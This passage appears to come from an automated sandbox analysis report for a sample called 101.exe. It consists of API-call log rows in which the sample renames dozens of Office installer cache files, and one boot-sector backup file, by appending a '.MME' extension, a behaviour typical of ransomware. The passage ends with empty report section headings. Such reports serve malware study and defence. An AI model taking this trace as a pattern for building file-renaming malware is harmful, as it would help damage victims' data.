MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\BOOTSECT.BAK.MME flags: 2 oldfilepath_r: \\?\M:\BOOTSECT.BAK newfilepath: M:\BOOTSECT.BAK.MME oldfilepath: M:\BOOTSECT.BAK	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC newfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC.MME oldfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi newfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi	1	1

101.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All